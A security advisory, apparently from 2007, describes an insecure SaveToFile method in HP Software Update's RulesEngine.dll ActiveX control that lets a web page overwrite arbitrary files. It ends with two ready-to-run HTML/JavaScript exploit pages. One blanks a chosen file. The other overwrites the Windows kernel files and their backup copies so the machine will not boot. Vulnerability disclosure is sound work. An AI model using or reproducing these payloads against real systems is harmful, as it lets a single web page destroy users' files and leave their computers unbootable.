HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities

Advisory: ///////// 

There is another remotely exploitable flaw within software preinstalled 
in HP notebook machines. This time, the culprit is automatic software 
update tool provided by the vendor.The Potential exploitation may lead 
to user files loss or altering vital system files (e.g. kernel), thus 
leaving PC unbootable. 

Overview: ///////// 

The flaw is located in the software called HP Software Update shipped 
with the HP notebooks to support automatic software updates and critical 
vulnerability patching. One of the ActiveX controls deployed by default 
by the vendor contains an insecure method giving a potential attacker 
the remote system arbitrary file write access. 

Impact: /////// 

Remote user files contents corruption Remote system kernel files damage 
/ Operating System DoS condition 

Attack vectors: /////////////// 

There are two main attack vector schemes: 

- inducing remote user to launch WWW link after obtaining the 
information about the location of an arbitrary file(s) locations/names 
in the remote system. After clicking the link the files contents will be 
unrecoverably destroyed. This attack vector thus requires additional 
social engineering of the vitim to acquire exact name and location of 
the potential attack target files. - inducing remote user to launch WWW 
link resulting in corruption of vital Operating System files, leaving 
the system unusable. This attack vector DOESN'T require any additional 
victim social engineering, because the system files are always placed in 
the predictable locations. 

Technical details: ////////////////// 

The vulnerable ActiveX control EngineRules.dll is a component of HP 
Software Updates system designed by the vendor. 

It has assigned CLSID: 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by 
default included to "Safe for Scripting" OLE components, that allows 
full execution scripting access to the control methods from within the 
browser. 

The default control installation path is C:\Program 
Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll 

The control is used by the the HP Software Updates software's 
HPWUCli.exe client application to enumerate, load and store available 
software patches information. The HPWUCli.exe binary is located in the 
directory: C:\Program Files\HP\HP Software Update\ 

The control may also be used by a remote WWW service, such as 
Hewlett-Packard online software update service. 

The potentialy insecure method is: void SaveToFile(String dataFilePath); 

This method is used to store the software patch specific data (version, 
remote location, vendor name, software description) in the binary file 
beginning with the 32bit integer value containing the actual patches 
count stored in the data file. 

The problem lies in the lack of distinguish between local and global 
data file area in this control. Both LoadDataFromFile() method and 
SaveDataToFile() method have an access to the entire file system data 
area, therefore any arbitrary user file can be accessed remotely using 
one of these methods by a remote entity. Use the SaveDataToFile() can be 
exploited to store the empty-by-initialize software patch data in the 
existing file, which will result in previous file contents loss and 
resetting it to 4 zero-bytes, describing a zero-size patch. 

Noticing a specific vulnerability location (vendor's software update 
system), simple disabling of the vulnerable control by the vendor's 
patch (like in the other HP software vulnerbility case - HPInfo) would 
result in the machine software update system compromise in this case and 
would leave the user vulnerable to the future security issues. 

Therefore reimplemetation of the update system and/or vulnerable control 
local data area implementation is strongly recommended. 

Remote Kernel Wreckage Exploit ////////////////////////////// 

Using this flaw one can construct an armed exploit, able for example to 
destroy remote system kernel files and make the remote machine 
UNBOOTABLE. The exploit is using vulnerable SaveToFile() to overwrite 
the NT System kernel files with the 4 zero bytes. The target are memory 
mapped ntoskrnl.exe and ntkrnlpa.exe kernel files which don't have a 
write lock set on them and may be opened for write. Although Windows NT 
system contains a protection for this kind of activity (system files 
overwrite) it can be fooled by overwriting simultanously: system binary 
files backup directory (\System32\DllCache\) actual system kernel files 
(\System32\) and the Driver Backup directory (\Windows\Driver Cache\) 
kernel files. 

After the execution it will store an zero-initialized patch information 
using SaveToFile() method sequentially to ntoskrnl.exe, ntkrnlpa.exe, 
ntkrnlmp.exe ,ntkrpamp.exe NT kernel files , first in the 
System32\DllCache\ directory, second to \System32\ directory and finally 
to Windows\Driver Cache\ dir. After the very next OS shutdown, machine 
will not be bootable anymore. 

The exploit code has been attached to the end of this advisory. NOTE 
however that it is provided ONLY as a Proof of Concept code and has been 
released ONLY to estimate the impact level of the issue. 

Vulnerable Software: //////////////////// 

HP Software Update client v3.0.8.4 RulesEngine.dll ActiveX CTL v1.0 

Internet Explorer 6.0 Internet Explorer 7.0 

Windows XP Home Windows XP Pro Windows 2000 Windows 2003 Windows Vista 

Vulnerable Hardware /////////////////// 

Every HP notebook machine containing the HP Software Updates application 
is vulnerable. It is possible that the vulnerable machine model list 
disclosed by the vendor as a confirmation to the previous issue 
concerning HP laptops - "HP Info Center" case, will be similar in this 
case. 

Exploits: ///////// 

////////////////////////////////////////// //Remote Arbitrary File Corruption Exploit ////////////////////////////////////////// 

<html> <head> <script language="JavaScript"> 

var filePath="c:\\temp\\testfile.txt"; 

function spawn3() { o2obj.SaveToFile(filePath); } 

</script> </head> 

<body onload="spawn3()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> 
</html> 

//////////////////////////////// //Remote Kernel Wreckage Exploit  //////////////////////////////// // // // WARNING! THE REAL THING... // 
DON'T TRY THIS AT HOME! // THIS WILL DAMAGE YOUR // HP COMPUTER SYSTEM!!! // // //////////////////////////////// 

<html> <head> <script language="JavaScript"> 

function spawn3() { 

o2obj.EvaluateRules(); 

o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe"); 

o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe"); 

o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe"); 
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe"); 

o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab"); 
o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab"); } 

function meltdown() { spawn3(); spawn3(); spawn3(); } 

</script> </head> 

<body onload="meltdown()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 
classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> 
</html> 

Related final word: /////////////////// 

Spiderpig, spiderpig, does whatever the spiderpig does... ;-) 

Links: ////// 

Original advisory link: 
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt 

Credits: //////// 

Issue discovery and research: porkythepig Contact: porkythepig@anspi.pl 

# milw0rm.com [2007-12-19]